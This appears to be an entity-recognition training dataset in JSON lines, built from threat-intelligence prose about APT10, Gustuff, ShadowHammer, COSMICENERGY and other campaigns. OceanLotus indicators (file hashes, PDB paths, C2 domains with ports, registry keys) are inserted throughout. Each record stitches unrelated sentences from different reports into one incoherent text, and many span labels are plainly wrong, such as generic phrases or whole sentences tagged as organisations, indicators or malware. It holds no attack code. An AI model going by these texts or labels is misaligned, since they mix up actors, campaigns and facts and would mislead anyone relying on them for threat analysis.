{"text": "But that does n't mean companies and organizations are out of the woods . This report is an initial public release of research PwC UK and BAE Systems have conducted into new , sustained global campaigns by an established threat actor against managed IT service providers and their clients as well as several directly targeted organisations in Japan . OceanLotus : 0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 Loader #1 . None PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user - supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 127, "end": 133, "label": "Organization"}, {"start": 138, "end": 149, "label": "Organization"}, {"start": 221, "end": 233, "label": "Organization"}, {"start": 242, "end": 270, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 364, "end": 428, "label": "Indicator"}, {"start": 446, "end": 452, "label": "System"}, {"start": 453, "end": 649, "label": "Malware"}]}
{"text": "They should still be on the lookout for these kinds of trojans , as the attackers could target corporate accounts that contain large amounts of money . Since late 2016 , PwC UK and BAE Systems have been assisting victims of a new cyber espionage campaign conducted by APT10 . OceanLotus : a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e Loader #1 . KillNet Appears to Increase Capabilities", "spans": [{"start": 170, "end": 176, "label": "Organization"}, {"start": 181, "end": 192, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 276, "end": 286, "label": "Organization"}, {"start": 289, "end": 353, "label": "Indicator"}, {"start": 366, "end": 373, "label": "Organization"}]}
{"text": "The information collected by the malware and the control over the victim 's mobile device allows their operators to perform more complex social engineering attacks . The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . OceanLotus : 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Loader #2 . It is possible that the malware was used to support exercises such as the ones hosted by Rostelecom - Solar in 2021 in collaboration with the Russian Ministry of Energy or in 2022 for the ( SPIEF ) .", "spans": [{"start": 240, "end": 268, "label": "Organization"}, {"start": 271, "end": 275, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}, {"start": 383, "end": 387, "label": "Organization"}, {"start": 417, "end": 427, "label": "Organization"}, {"start": 430, "end": 494, "label": "Indicator"}, {"start": 596, "end": 614, "label": "Organization"}, {"start": 649, "end": 675, "label": "Organization"}, {"start": 697, "end": 702, "label": "Organization"}]}
{"text": "A motivated attacker can use this trojan to harvest usernames and passwords and then reuse them to login into the organization 's system where the victim works . APT10 ceased its use of the Poison Ivy malware family after a 2013 FireEye report , which comprehensively detailed the malware 's functionality and features , and its use by several China-based threat actors , including APT10 . OceanLotus : e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e Loader #2 . The Budworm advanced persistent threat APT group continues to actively develop its toolset .", "spans": [{"start": 162, "end": 167, "label": "Organization"}, {"start": 190, "end": 215, "label": "System"}, {"start": 229, "end": 236, "label": "Organization"}, {"start": 356, "end": 369, "label": "Organization"}, {"start": 382, "end": 387, "label": "Organization"}, {"start": 390, "end": 400, "label": "Organization"}, {"start": 403, "end": 467, "label": "Indicator"}, {"start": 480, "end": 528, "label": "Organization"}, {"start": 563, "end": 570, "label": "System"}]}
{"text": "This is a good example where two-factor authentication based on SMS would fail since the attacker can read the SMS . APT10 primarily used PlugX malware from 2014 to 2016 , progressively improving and deploying newer versions , while simultaneously standardising their command and control function . OceanLotus : cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d Loader #2 . Additionally , by using leaked source code , threat actors can confuse or mislead investigators , as security professionals may be more likely to misattribute the activity to the wrong actor .", "spans": [{"start": 117, "end": 122, "label": "Organization"}, {"start": 138, "end": 151, "label": "System"}, {"start": 299, "end": 309, "label": "Organization"}, {"start": 312, "end": 376, "label": "Indicator"}, {"start": 490, "end": 512, "label": "Organization"}, {"start": 535, "end": 579, "label": "Vulnerability"}]}
{"text": "Corporations can protect themselves from these side-channel attacks by deploying client-based two-factor authentication , such as Duo Security . PwC UK and BAE Systems assess it is highly likely that APT10 is a China-based threat actor with a focus on espionage and wide ranging information collection . OceanLotus : 9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 Loader #2 . Some researchers believe that it is linked to TA570 because of the similarity of delivering method between it and trojan .", "spans": [{"start": 130, "end": 142, "label": "System"}, {"start": 145, "end": 151, "label": "Organization"}, {"start": 156, "end": 167, "label": "Organization"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 223, "end": 235, "label": "Organization"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 304, "end": 314, "label": "Organization"}, {"start": 317, "end": 381, "label": "Indicator"}, {"start": 399, "end": 410, "label": "Organization"}, {"start": 440, "end": 445, "label": "Organization"}, {"start": 457, "end": 514, "label": "Indicator"}]}
{"text": "One of the most impressive features of this malware is its resilience . APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world . OceanLotus : ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f Loader #2 . The adversary may drop or create malware , tools , or other non - native files on a target system to accomplish this , potentially leaving behind traces of malicious activities .", "spans": [{"start": 72, "end": 77, "label": "Organization"}, {"start": 176, "end": 188, "label": "System"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 270, "end": 280, "label": "Organization"}, {"start": 283, "end": 347, "label": "Indicator"}, {"start": 506, "end": 536, "label": "Indicator"}]}
{"text": "If the command and control ( C2 ) server is taken down , the malicious operator can still recover the malware control by sending SMS messages directly to the infected devices . APT10 , a name originally coined by FireEye , is also referred to as Red Apollo by PwC UK , CVNX by BAE Systems , Stone Panda by CrowdStrike , and menuPass Team more broadly in the public domain . OceanLotus : 478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 Loader #2 . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 213, "end": 220, "label": "Organization"}, {"start": 246, "end": 256, "label": "Organization"}, {"start": 260, "end": 266, "label": "Organization"}, {"start": 269, "end": 273, "label": "Organization"}, {"start": 277, "end": 288, "label": "Organization"}, {"start": 291, "end": 302, "label": "Organization"}, {"start": 306, "end": 317, "label": "Organization"}, {"start": 324, "end": 337, "label": "Organization"}, {"start": 374, "end": 384, "label": "Organization"}, {"start": 387, "end": 451, "label": "Indicator"}, {"start": 464, "end": 471, "label": "Organization"}, {"start": 643, "end": 655, "label": "Organization"}]}
{"text": "This makes the taking down and recovery of the network much harder and poses a considerable challenge for defenders . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro3 similarly detailing the use of EvilGrab malware . OceanLotus : 72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a Payload PNG ( loader #1 ) . Mandiant Intelligence assesses with high confidence that operations for which the pro - Russia hacktivist collective KillNet has claimed responsibility consistently mirror Russian strategic objectives , although we have not yet uncovered direct evidence of the collective \u2019s collaboration with or direction from Russian security services .", "spans": [{"start": 122, "end": 134, "label": "Organization"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 278, "end": 290, "label": "Organization"}, {"start": 305, "end": 330, "label": "System"}, {"start": 349, "end": 361, "label": "Organization"}, {"start": 393, "end": 409, "label": "System"}, {"start": 412, "end": 422, "label": "Organization"}, {"start": 425, "end": 489, "label": "Indicator"}, {"start": 518, "end": 539, "label": "Organization"}, {"start": 600, "end": 642, "label": "Organization"}]}
{"text": "THE CAMPAIGN The malware 's primary infection vector is SMS . The threat actor has previously been the subject of a range of open source reporting , including most notably a report by FireEye comprehensively detailing the threat actor 's use of the Poison Ivy malware family and blog posts by Trend Micro similarly detailing the use of EvilGrab malware . OceanLotus : 11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f Payload PNG ( loader #2 ) . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": [{"start": 66, "end": 78, "label": "Organization"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 222, "end": 234, "label": "Organization"}, {"start": 249, "end": 274, "label": "System"}, {"start": 293, "end": 304, "label": "Organization"}, {"start": 336, "end": 352, "label": "System"}, {"start": 355, "end": 365, "label": "Organization"}, {"start": 368, "end": 432, "label": "Indicator"}, {"start": 461, "end": 474, "label": "Organization"}]}
{"text": "Just like the old-school mail worms that used the victim 's address book to select the next victims , this banking trojan 's activation cycle includes the exfiltration of the victim 's address book . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB )1 and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced Payload PNG ( loader #2 ) . TeamTNT has used an IRC bot for C2 communications.[13 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": [{"start": 60, "end": 72, "label": "System"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 351, "end": 361, "label": "Organization"}, {"start": 366, "end": 391, "label": "Organization"}, {"start": 505, "end": 509, "label": "Organization"}, {"start": 512, "end": 522, "label": "Organization"}, {"start": 525, "end": 589, "label": "Indicator"}, {"start": 618, "end": 625, "label": "Organization"}, {"start": 638, "end": 645, "label": "System"}, {"start": 650, "end": 652, "label": "System"}]}
{"text": "The trojan will receive instructions from the C2 to spread . The research and ongoing tracking of APT10 by both PwC UK and BAE . OceanLotus : E:\\ProjectGit\\SHELL\\BrokenSheild\\BrokenShieldPrj\\Bin\\x86\\Release\\DllExportx86.pdb Loader #1 . AdFind A publicly available tool that is used to query Active Directory .", "spans": [{"start": 98, "end": 103, "label": "Organization"}, {"start": 112, "end": 118, "label": "Organization"}, {"start": 123, "end": 126, "label": "Organization"}, {"start": 129, "end": 139, "label": "Organization"}, {"start": 142, "end": 223, "label": "Indicator"}, {"start": 236, "end": 242, "label": "System"}]}
{"text": "Spread command from C2 The victim receives the command sendSMSMass . APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs . OceanLotus : C:\\Users\\Meister\\Documents\\Projects\\BrokenShield\\Bin\\x86\\Release\\BrokenShield.pdb Loader #2 . We believe this is a different campaign and threat actor altogether .", "spans": [{"start": 69, "end": 74, "label": "Organization"}, {"start": 219, "end": 229, "label": "Organization"}, {"start": 234, "end": 259, "label": "Organization"}, {"start": 373, "end": 377, "label": "Organization"}, {"start": 380, "end": 390, "label": "Organization"}, {"start": 393, "end": 474, "label": "Indicator"}, {"start": 518, "end": 526, "label": "Organization"}, {"start": 531, "end": 543, "label": "Organization"}]}
{"text": "Usually , this message targets four or five people at a time . PwC UK has been engaged in supporting investigations linked to APT10 compromises . OceanLotus : kermacrescen.com 7244 . Not only can email accounts contain access to sensitive data , they can provide an even more convincing persona that is used to execute BEC campaigns impersonating other users to further collect credentials and potentially gain access to other systems .", "spans": [{"start": 63, "end": 69, "label": "Organization"}, {"start": 126, "end": 131, "label": "Organization"}, {"start": 146, "end": 156, "label": "Organization"}, {"start": 159, "end": 175, "label": "Indicator"}, {"start": 319, "end": 332, "label": "Organization"}]}
{"text": "The body contains a message and URL . As a result of our analysis of APT10 's activities , we believe that it almost certainly benefits from significant staffing and logistical resources , which have increased over the last three years , with a significant step-change in 2016 . OceanLotus : stellefaff.com 7244 . While COSMICENERGY \u2019s capabilities are not significantly different from previous OT malware families \u2019 , its discovery highlights several notable developments in the OT threat landscape .", "spans": [{"start": 69, "end": 74, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 292, "end": 306, "label": "Indicator"}, {"start": 320, "end": 335, "label": "Malware"}, {"start": 395, "end": 414, "label": "Malware"}]}
{"text": "Again , the concept is that new victims are more likely to install the malware if the SMS comes from someone they know . Due to the scale of the threat actor 's operations throughout 2016 and 2017 , we similarly assess it currently comprises multiple teams , each responsible for a different section of the day-to-day operations , namely domain registration , infrastructure management , malware development , target operations , and analysis . OceanLotus : manongrover.com 7244 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": [{"start": 145, "end": 157, "label": "Organization"}, {"start": 445, "end": 455, "label": "Organization"}, {"start": 458, "end": 473, "label": "Indicator"}, {"start": 512, "end": 519, "label": "Organization"}]}
{"text": "When a victim tries to access the URL in the SMS body , the C2 will check if the mobile device meets the criteria to receive the malware ( see infrastructure section ) . APT10 withdrew from direct targeting using Poison Ivy in 2013 and conducted its first known retooling operation , upgrading its capabilities and replatforming to use PlugX . OceanLotus : background.ristians.com:8888 11b4 . They contain some invalid URLs and IPs .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 213, "end": 223, "label": "System"}, {"start": 336, "end": 341, "label": "System"}, {"start": 344, "end": 354, "label": "Organization"}, {"start": 357, "end": 385, "label": "Indicator"}, {"start": 398, "end": 431, "label": "Indicator"}]}
{"text": "If the device does not meet the criteria , it wo n't receive any data , otherwise , it will be redirected to a second server to receive a copy of the malware to install on their device . It is highly likely that this is due to the release of the 2013 FireEye report . OceanLotus : enum.arkoorr.com:8531 11b4 . Open Babel allows users to \u201c search , convert , analyze , or store data from molecular modeling , chemistry , solid - state materials , biochemistry , or related areas , \u201d according to its website , and is used in other popular pieces of software in the science field .", "spans": [{"start": 251, "end": 258, "label": "Organization"}, {"start": 268, "end": 278, "label": "Organization"}, {"start": 281, "end": 302, "label": "Indicator"}, {"start": 310, "end": 320, "label": "System"}]}
{"text": "The domain on this campaign was registered on Jan. 19 , 2019 . Our report will detail the most recent campaigns conducted by APT10 , including the sustained targeting of MSPs , which we have named Operation Cloud Hopper , and the targeting of a number of Japanese institutions . OceanLotus : worker.baraeme.com:8888 11b4 . The Platform can look for indicators across file attachments , embedded links , and more and provides inplatform scoring .", "spans": [{"start": 125, "end": 130, "label": "Organization"}, {"start": 170, "end": 174, "label": "Organization"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 279, "end": 289, "label": "Organization"}, {"start": 292, "end": 315, "label": "Indicator"}, {"start": 327, "end": 335, "label": "System"}]}
{"text": "However , Talos has identified that was used at least since November 2018 . MSPs therefore represent a high-payoff target for espionagefocused threat actors such as APT10 . OceanLotus : enum.arkoorr.com:8888 11b4 . The leaked Biderman emails show that Harrison made good on his threats , and that in the months that followed Harrison began targeting Biderman and other Ashley Madison executives with menacing anonymous emails and spoofed phone calls laced with profanity and anti - Semitic language .", "spans": [{"start": 10, "end": 15, "label": "Organization"}, {"start": 76, "end": 80, "label": "Organization"}, {"start": 143, "end": 156, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 173, "end": 183, "label": "Organization"}, {"start": 186, "end": 207, "label": "Indicator"}, {"start": 219, "end": 241, "label": "Indicator"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 350, "end": 358, "label": "Organization"}, {"start": 369, "end": 394, "label": "Organization"}]}
{"text": "During the investigation , Talos was also able to determine that the same infrastructure has been used to deploy similar campaigns using different versions of the malware . Given the level of client network access MSPs have , once APT10 has gained access to a MSP , it is likely to be relatively straightforward to exploit this and move laterally onto the networks of potentially thousands of other victims . OceanLotus : worker.baraeme.com:8531 11b4 . The UK \u2019s National Cyber Security Centre ( NCSC ) assesses that the Russian Military Intelligence was almost certainly involved in the 13 January defacements of Ukrainian government websites and the deployment of Whispergate destructive malware .", "spans": [{"start": 27, "end": 32, "label": "Organization"}, {"start": 214, "end": 218, "label": "Organization"}, {"start": 231, "end": 236, "label": "Organization"}, {"start": 260, "end": 263, "label": "System"}, {"start": 409, "end": 419, "label": "Organization"}, {"start": 422, "end": 445, "label": "Indicator"}, {"start": 457, "end": 502, "label": "Organization"}, {"start": 517, "end": 550, "label": "Organization"}, {"start": 614, "end": 643, "label": "Organization"}, {"start": 666, "end": 697, "label": "Malware"}]}
{"text": "Distribution of victims . This , in turn , would provide access to a larger amount of intellectual property and sensitive data . OceanLotus : plan.evillese.com:8531 11b4 . Seven of the vulnerabilities included in today \u2019s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": [{"start": 129, "end": 139, "label": "Organization"}, {"start": 142, "end": 164, "label": "Indicator"}, {"start": 251, "end": 298, "label": "Indicator"}]}
{"text": "Talos assess with high confidence that this campaign is targeting Australian financial institutions based on several factors . APT10 has been observed to exfiltrate stolen intellectual property via the MSPs , hence evading local network defences . OceanLotus : background.ristians.com:8531 11b4 . Copies of the site at archive.org show it was the work of someone calling themselves \u201c The Chaos Creator . \u201d", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 127, "end": 132, "label": "Organization"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 261, "end": 289, "label": "Indicator"}, {"start": 384, "end": 401, "label": "Organization"}]}
{"text": "Our Umbrella telemetry shows that the majority of the request comes from Australia and the majority of the phone numbers infected have the international indicative for Australia . The command and control ( C2 ) infrastructure chosen by APT10 for Operation Cloud Hopper is predominantly referenced using dynamic-DNS domains . OceanLotus : plan.evillese.com:8888 11b4 . The dump files will start ' NSPPE- ' .", "spans": [{"start": 236, "end": 241, "label": "Organization"}, {"start": 303, "end": 322, "label": "System"}, {"start": 325, "end": 335, "label": "Organization"}, {"start": 338, "end": 360, "label": "Indicator"}, {"start": 368, "end": 406, "label": "Indicator"}]}
{"text": "Finally , the specific overlays are designed for Australian financial institutions , and Australia is one of the geographic regions that is accepted by the C2 . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs . OceanLotus : SOFTWARE\\Classes\\CLSID\\{E3517E26-8E93-458D-A6DF-8030BC80528B} 7244 . As for who was hit the hardest , around 16 percent of ransomware incidents affecting State , Local , Tribal , and Tribunal ( SLTT ) governments were from LockBit , says the MS - ISAC .", "spans": [{"start": 256, "end": 261, "label": "Organization"}, {"start": 293, "end": 297, "label": "Organization"}, {"start": 300, "end": 310, "label": "Organization"}, {"start": 467, "end": 525, "label": "Organization"}, {"start": 536, "end": 543, "label": "Organization"}, {"start": 555, "end": 564, "label": "Organization"}]}
{"text": "DNS queries distribution over time The campaign does n't seem to be growing at a fast pace . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . OceanLotus : SOFTWARE\\App\\AppX06c7130ad61f4f60b50394b8cba3d35f\\Applicationz 7244 . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": [{"start": 191, "end": 196, "label": "Organization"}, {"start": 267, "end": 277, "label": "Organization"}, {"start": 280, "end": 342, "label": "System"}, {"start": 525, "end": 618, "label": "Indicator"}]}
{"text": "Our data shows , on average , about three requests per hour to the drop host . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies . OceanLotus : SOFTWARE\\Classes\\CLSID\\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} 11b4 . In the UK , Vice Society accounts for a staggering proportion of known ransomware attacks on education \u2014 almost 70 % .", "spans": [{"start": 145, "end": 155, "label": "Organization"}, {"start": 223, "end": 232, "label": "Organization"}, {"start": 257, "end": 267, "label": "Organization"}, {"start": 351, "end": 363, "label": "Organization"}, {"start": 432, "end": 441, "label": "Organization"}]}
{"text": "This request is only made upon installation , but there is no guarantee that it will be installed . APT10 has , in the past , primarily been known for its targeting of government and US defence industrial base organisations , with the earliest known date of its activity being in December 2009 . Operation ShadowHammer . At this time , it is unknown how Sandworm gained initial access to the victim .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 168, "end": 178, "label": "Organization"}, {"start": 354, "end": 362, "label": "Organization"}]}
{"text": "This data , when analyzed with the number of commands to send SMSs that Talos received during the investigation , lead us to conclude that the malicious operator is aggressively spreading the malware , but that does n't seem to result in the same number of new infections . Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China . Earlier today , Motherboard published a story by Kim Zetter on Operation ShadowHammer , a newly discovered supply chain attack that leveraged ASUS Live Update software . Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": [{"start": 283, "end": 288, "label": "Organization"}, {"start": 420, "end": 431, "label": "Organization"}, {"start": 546, "end": 562, "label": "System"}, {"start": 583, "end": 595, "label": "Malware"}]}
{"text": "Examples of the overlays available to the malware Above , you can see examples of the injections that distributed to the malware as part of this specific campaign . In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient . While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore , we would like to share some important details about the attack . In several cases , the threat actor used 7 - zip to create an encrypted segmented archive to compress the reconnaissance results .", "spans": [{"start": 192, "end": 201, "label": "Organization"}, {"start": 222, "end": 234, "label": "Organization"}, {"start": 246, "end": 261, "label": "System"}, {"start": 561, "end": 568, "label": "System"}]}
{"text": "While doing our investigation we were able to identify other malware packages with different names . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX . In January 2019 , we discovered a sophisticated supply chain attack involving the ASUS Live Update Utility . The backdoor \u2019s primary functionality involves retrieving and executing additional modules .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 224, "end": 234, "label": "System"}, {"start": 238, "end": 243, "label": "System"}, {"start": 328, "end": 352, "label": "System"}, {"start": 355, "end": 445, "label": "Malware"}]}
{"text": "Some of these might have been used on old campaigns or were already prepared for new campaigns . We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials . The attack took place between June and November 2018 and according to our telemetry , it affected a large number of users . \u2013 Consistent with KillNet activity in 2022 , the majority of claimed attacks in 2023 targeted entities in the U.S. and Europe .", "spans": [{"start": 134, "end": 139, "label": "Organization"}, {"start": 172, "end": 175, "label": "System"}, {"start": 202, "end": 206, "label": "Organization"}, {"start": 363, "end": 379, "label": "Organization"}]}
{"text": "MALWARE TECHNICAL DETAILS During our investigation , researchers uncovered a malware known as \" Gustuff. '' . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B . ASUS Live Update is an utility that is pre-installed on most ASUS computers and is used to automatically update certain components such as BIOS , UEFI , drivers and applications . The contents found in secure[.]66[.]to often lead to zhu[.]vn , which is Hack520 \u2019s domain for hosting his own private blog .", "spans": [{"start": 96, "end": 104, "label": "Malware"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 210, "end": 218, "label": "System"}, {"start": 222, "end": 228, "label": "System"}, {"start": 247, "end": 271, "label": "System"}, {"start": 342, "end": 358, "label": "System"}, {"start": 403, "end": 407, "label": "Organization"}, {"start": 481, "end": 485, "label": "System"}, {"start": 488, "end": 492, "label": "System"}, {"start": 495, "end": 502, "label": "System"}, {"start": 507, "end": 519, "label": "System"}, {"start": 544, "end": 560, "label": "Indicator"}, {"start": 575, "end": 583, "label": "Indicator"}, {"start": 595, "end": 612, "label": "Organization"}]}
{"text": "Given the lack of indicators of compromise , we decided to check to see if this was the same malware we had been researching . APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots . According to Gartner , ASUS is the world\u2019s 5th-largest PC vendor by 2017 unit sales . Over the last decade , Iran has waged a number of disruptive and destructive cyber campaigns against government entities and companies alike , becoming infamous for its deployment of wiper malware as well as its retaliatory attack strategy .", "spans": [{"start": 127, "end": 132, "label": "Organization"}, {"start": 188, "end": 203, "label": "System"}, {"start": 207, "end": 223, "label": "System"}, {"start": 314, "end": 321, "label": "Organization"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 410, "end": 414, "label": "Organization"}, {"start": 437, "end": 479, "label": "Organization"}, {"start": 488, "end": 507, "label": "Organization"}, {"start": 512, "end": 521, "label": "Organization"}]}
{"text": "Our Threat Intelligence and Interdiction team found the Gustuff malware being advertised in the Exploit.in forum as a botnet for rent . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . This makes it an extremely attractive target for APT groups that might want to take advantage of their userbase . Organizations must do better to safeguard their sensitive data and combat the growing ransomware threats by leveraging key prevention , detection and response components .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 96, "end": 106, "label": "Indicator"}, {"start": 235, "end": 247, "label": "Organization"}]}
{"text": "The seller , known as \" bestoffer , '' was , at some point , expelled from the forum . In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network . Based on our statistics , over 57 , 000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time . The connection to the Lazarus group was obvious by inspecting the tools , strategies , and methods already linked to the North Korean actor .", "spans": [{"start": 116, "end": 121, "label": "Organization"}, {"start": 136, "end": 149, "label": "System"}, {"start": 153, "end": 156, "label": "System"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 301, "end": 310, "label": "Organization"}, {"start": 373, "end": 389, "label": "System"}, {"start": 432, "end": 449, "label": "Organization"}, {"start": 465, "end": 512, "label": "Organization"}, {"start": 531, "end": 553, "label": "Organization"}]}
{"text": "Gustuff advertising screenshot The companies advertised in the image above were from Australia , which matches up with the campaign we researched . The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing . We are not able to calculate the total count of affected users based only on our data ; however , we estimate that the real scale of the problem is much bigger and is possibly affecting over a million users worldwide . Network traffic and process related telemetry to / from host(s ) operating the MicroSCADA software .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 184, "end": 192, "label": "System"}, {"start": 203, "end": 209, "label": "System"}, {"start": 228, "end": 237, "label": "System"}]}
{"text": "The screenshots provided by the author align with the advertised features and the features that we discovered while doing our analysis . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest . The goal of the attack was to surgically target an unknown pool of users , which were identified by their network adapters\u2019 MAC addresses . It is a challenge for any organisation to fight off a determined ransomware gang like Vice Society , but schools face the added pressure of doing so in a notoriously tight budgetary environment .", "spans": [{"start": 209, "end": 216, "label": "Organization"}, {"start": 486, "end": 501, "label": "Organization"}, {"start": 507, "end": 519, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}]}
{"text": "Admin panel The administration panel shows the application configuration , which matches the commands from the C2 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools . To achieve this , the attackers had hardcoded a list of MAC addresses in the trojanized samples and this list was used to identify the actual intended targets of this massive operation . For the latest protection updates , please visit the Symantec Protection Bulletin .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 490, "end": 498, "label": "Organization"}]}
{"text": "Country selection The administration console screenshots also show the ability to filter the results by country . For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads . We were able to extract more than 600 unique MAC addresses from over 200 samples used in this attack . COSMICENERGY \u2019s capabilities and overall attack strategy appear reminiscent of the , which issued IEC-104 ON / OFF commands to interact with RTUs and , according to one , may have made use of an MSSQL server as a conduit system to access OT .", "spans": [{"start": 128, "end": 134, "label": "Organization"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 192, "end": 200, "label": "System"}, {"start": 205, "end": 212, "label": "System"}, {"start": 238, "end": 253, "label": "System"}, {"start": 417, "end": 432, "label": "Malware"}, {"start": 612, "end": 624, "label": "System"}]}
{"text": "In this case , \" AU '' is the code shown , which is Australia . During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 . Of course , there might be other samples out there with different MAC addresses in their list . Monitor and analyze traffic patterns and packet inspection associated to protocol(s ) , leveraging SSL / TLS inspection for encrypted traffic , that do not follow the expected protocol standards and traffic flows ( e.g extraneous packets that do not belong to established flows , gratuitous or anomalous traffic patterns , anomalous syntax , or structure ) .", "spans": [{"start": 129, "end": 134, "label": "Organization"}, {"start": 503, "end": 561, "label": "Indicator"}, {"start": 564, "end": 604, "label": "Indicator"}, {"start": 607, "end": 638, "label": "Indicator"}]}
{"text": "Based on this information , Talos assesses with high confidence that the malware is the same and this is , in fact , the Gustuff malware . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves . We believe this to be a very sophisticated supply chain attack , which matches or even surpasses the Shadowpad and the CCleaner incidents in complexity and techniques . Simultaneously , a new variant of Monti , based on the Linux platform , has surfaced , demonstrating notable differences from its previous Linux - based versions .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 121, "end": 128, "label": "Malware"}, {"start": 202, "end": 216, "label": "System"}, {"start": 272, "end": 278, "label": "System"}, {"start": 283, "end": 292, "label": "System"}, {"start": 498, "end": 503, "label": "Organization"}, {"start": 519, "end": 533, "label": "Organization"}]}
